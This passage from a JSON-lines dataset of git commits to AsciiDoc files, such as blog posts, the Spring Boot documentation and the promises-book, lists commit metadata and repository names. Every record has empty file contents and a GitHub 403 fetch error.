2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb8e8d5cd7910efd75de2112604e9cc22ac64ec","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39ca589629f9f139681c4ce7661846f54a4b7a1","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c3c8197c7e4111017c283159753b18b2abb89f","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3f5c4e8810c36e6860fd9586cc5aa7d8a07c724","subject":"refactor(Ch1): Promises\u306e\u4ed5\u69d8\u3078\u306e\u30ea\u30f3\u30af\u3092\u5185\u90e8\u7684\u306a\u3082\u306e\u3078\u3068\u5909\u66f4","message":"refactor(Ch1): Promises\u306e\u4ed5\u69d8\u3078\u306e\u30ea\u30f3\u30af\u3092\u5185\u90e8\u7684\u306a\u3082\u306e\u3078\u3068\u5909\u66f4\n","repos":"tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,dieface\/promises-book,wenber\/promises-book,genie88\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,wenber\/promises-book,purepennons\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,azu\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,liubin\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,dieface\/promises-book,azu\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,azu\/promises-book,liubin\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,oToUC\/promises-book,azu\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book","old_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8482a88e555bba3ac5918a6dd1e71958a7b625e","subject":"Update 2018-02-02-S-Y-S-T-E-M.adoc","message":"Update 2018-02-02-S-Y-S-T-E-M.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-S-Y-S-T-E-M.adoc","new_file":"_posts\/2018-02-02-S-Y-S-T-E-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14e2534f7205a06fab8692aad830a660e5a8454","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae498cc595c78e62bffbe2e4f5b15c6aa3438d08","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ef5bb4355164ef55060806d2bf2b5aa724f8e64","subject":"Minor edits to styleguide","message":"Minor edits to styleguide","repos":"vonnopsled\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,pidydx\/artifacts,sebastianwelsh\/artifacts,keithtyler\/artifacts,keithtyler\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc84eebe63197fcba4e2681d05d1adeb77d1832b","subject":"Small changes to documentation.","message":"Small changes to documentation.\n","repos":"ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts,Onager\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41e1f35792e633ecc195d412441a312dfd145886","subject":"Update 2016-02-09-Behaviour-driven-development-in-action.adoc","message":"Update 2016-02-09-Behaviour-driven-development-in-action.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-09-Behaviour-driven-development-in-action.adoc","new_file":"_posts\/2016-02-09-Behaviour-driven-development-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4f3831806442ee455cf3d376710aa5aa84c361","subject":"y2b create post The Best Instagram Camera Ever Created","message":"y2b create post The Best Instagram Camera Ever Created","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-09-The-Best-Instagram-Camera-Ever-Created.adoc","new_file":"_posts\/2016-08-09-The-Best-Instagram-Camera-Ever-Created.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4a41cd78a8fadefede5e19e1ea2f92ebc18895","subject":"Adding Resource Adaptors index","message":"Adding Resource Adaptors index\n","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"core\/src\/main\/asciidoc\/jain-slee\/Resource-Adaptors.adoc","new_file":"core\/src\/main\/asciidoc\/jain-slee\/Resource-Adaptors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1816a815617cfd3d187f65e716ed5df9932fb221","subject":"Update 2015-03-04-Getting-Set-Up.adoc","message":"Update 2015-03-04-Getting-Set-Up.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2015-03-04-Getting-Set-Up.adoc","new_file":"_posts\/2015-03-04-Getting-Set-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c3e5a5088e60f50f77d85d6747c395b281b460","subject":"Update 2016-03-29-Glosario.adoc","message":"Update 2016-03-29-Glosario.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Glosario.adoc","new_file":"_posts\/2016-03-29-Glosario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f665249cd9f090180c3b674ac9c056d3af5ca07c","subject":"Update 2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","message":"Update 2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","new_file":"_posts\/2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b55e2d0934e36904887e6bf99a36ba9317240eab","subject":"y2b create post Check out this BEAST! -- In Win D-Frame PC Case (CES 2013)","message":"y2b create post Check out this BEAST! -- In Win D-Frame PC Case (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-Check-out-this-BEAST--In-Win-DFrame-PC-Case-CES-2013.adoc","new_file":"_posts\/2013-01-12-Check-out-this-BEAST--In-Win-DFrame-PC-Case-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c49b5d6e3f37ed93e9b763d23ac15db43e38e43e","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Ex\u00e9cution\/Print exec.adoc","new_file":"Ex\u00e9cution\/Print exec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0061e84a59a6f12ff982863f803b46f7699c9bf1","subject":"Document DevTools' requirement for shutdown hook to be registered","message":"Document DevTools' requirement for shutdown hook to be registered\n\nCloses gh-4153\n","repos":"jmnarloch\/spring-boot,bijukunjummen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,lburgazzoli\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,shangyi0102\/spring-boot,lucassaldanha\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,kamilszymanski\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,kdvolder\/spring-boot,lucassaldanha\/spring-boot,xiaoleiPENG\/my-project,hqrt\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,habuma\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,minmay\/spring-boot,olivergierke\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,dfa1\/spring-boot,joansmith\/spring-boot,sbuettner\/spring-boot,linead\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,bjornlindstrom\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,izeye\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,pvorb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,ollie314\/spring-boot,minmay\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,deki\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,sbcoba\/spring-boot,olivergierke\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,SaravananParthasarathy\/SPSDemo,kamilszymanski\/spring-boot,sbuettner\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,lenicliu\/spring-boot,dfa1\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,Nowheresly\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,tsachev\/spring-boot,htynkn\/spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,tiarebalbi\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,isopov\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,brettwooldridge\/spring-boot,candrews\/spring-boot,bjornlindstrom\/spring-boot,dfa1\/spring-boot,sebastiankirsch\/spring-boot,shangyi0102\/spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,sebastiankirsch\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,royclarkson\/spring-boot,herau\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,ameraljovic\/spring-boot,jbovet\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,vakninr\/spring-boot,minmay\/spring-boot,philwebb\/spring-boot-concourse,nebhale\/spring-boot,bijukunjummen\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,lexandro\/spring-boot,akmaharshi\/jenkins,zhangshuangquan\/spring-root,qerub\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,lburgazzoli\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,lenicliu\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,deki\/spring-boot,joansmith\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,zhangshuangquan\/spring-root,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,jmnarloch\/spring-boot,joansmith\/spring-boot,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,eddumelendez\/spring-boot,sbuettner\/spring-boot,mdeinum\/spring-boot,bclozel\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,DeezCashews\/spring-boot,srikalyan\/spring-boot,joshthornhill\/spring-boot,mosoft521\/spring-boot,bbrouwer\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot,i007422\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,sbuettner\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,srikalyan\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,lenicliu\/spring-boot,mrumpf\/spring-boot,jayarampradhan\/spring-boot,chrylis\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,afroje-reshma\/spring-boot-sample,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,jvz\/spring-boot,bjornlindstrom\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,neo4j-contrib\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,srikalyan\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,neo4j-contrib\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,jxblum\/spring-boot,DeezCashews\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,qerub\/spring-boot,ollie314\/spring-boot,jmnarloch\/spring-boot,sebastiankirsch\/spring-boot,wilkinsona\/spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,dfa1\/spring-boot,kamilszymanski\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,ilayaperumalg\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,ilayaperumalg\/spring-boot,lexandro\/spring-boot,felipeg48\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,ptahchiev\/spring-boot,lucassaldanha\/spring-boot,ihoneymon\/spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,afroje-reshma\/spring-boot-sample,drumonii\/spring-boot,ihoneymon\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,bjornlindstrom\/spring-boot,jmnarloch\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,izeye\/spring-boot,yhj630520\/spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot-concourse,ameraljovic\/spring-boot,herau\/spring-boot,ilayaperumalg\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,joshiste\/spring-boot,thomasdarimont\/spring-boot,izeye\/spring-boot,kamilszymanski\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,RichardCSantana\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,lucassaldanha\/spring-boot,joshthornhill\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,ameraljovic\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,lexandro\/spring-boot,kdvolder\/spring-boot,izeye\/spring-boot,qerub\/spring-boot,olivergierke\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,minmay\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,tsachev\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,royclarkson\/spring-boot,eddumelendez\/spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,cleverjava\/jenkins2-course-spring-boot,lenicliu\/spring-boot,lexandro\/spring-boot,srikalyan\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,xiaoleiPENG\/my-project,zhanhb\/spring-boot,pvorb\/spring-boot,mbenson\/spring-boot,lburgazzoli\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,srikalyan\/spring-boot,michael-simons\/spring-boot,royclarkson\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,shakuzen\/spring-boot,joshthornhill\/spring-boot,linead\/spring-boot,philwebb\/spring-boot,drumonii\/spring-boot,mbogoevici\/spring-boot,jmnarloch\/spring-boot,lburgazzoli\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,zhangshuangquan\/spring-root,herau\/spring-boot,NetoDevel\/spring-boot,bclozel\/spring-boot,donhuvy\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/using-spring-boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8348d15ec78067e2415e3a78d50b608d6cfbb266","subject":"[DOC] Update lib versions","message":"[DOC] Update lib versions\n","repos":"xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"237730314187192ad2fe80e6569042140bf22c09","subject":"Update 2017-01-09-First-blogs-ever.adoc","message":"Update 2017-01-09-First-blogs-ever.adoc","repos":"baocongchen\/blogs,baocongchen\/blogs,baocongchen\/blogs,baocongchen\/blogs","old_file":"_posts\/2017-01-09-First-blogs-ever.adoc","new_file":"_posts\/2017-01-09-First-blogs-ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/baocongchen\/blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6275fcb87ff7cfbc80066a9d9895823313ac7c6","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b18464c2cb828cdc3efc4cfe2b698b246d087c96","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d3073fd0be1d521b83c98a091949ee6b01db5e2","subject":"Add narada-tgms-base.adoc","message":"Add narada-tgms-base.adoc\n","repos":"qarea\/jirams,qarea\/planningms,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-tgms-base.adoc","new_file":"doc\/narada-tgms-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 